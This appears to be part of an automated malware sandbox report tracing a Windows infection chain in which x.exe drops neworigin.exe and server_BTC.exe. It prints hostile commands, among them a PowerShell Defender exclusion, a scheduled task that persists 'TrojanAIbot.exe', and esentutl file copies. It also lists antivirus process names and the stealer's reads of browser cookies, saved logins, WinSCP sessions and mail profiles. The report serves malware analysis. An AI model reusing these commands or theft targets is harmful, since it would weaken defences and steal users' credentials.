                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02D95ACC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02D9A7C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02D95BD8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02D9A810
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,29_2_02C35ACC
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,29_2_02C35BD7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetLocaleInfoA,29_2_02C3A810
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9920C GetLocalTime,4_2_02D9920C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D9B78C GetVersionExA,4_2_02D9B78C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7592, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
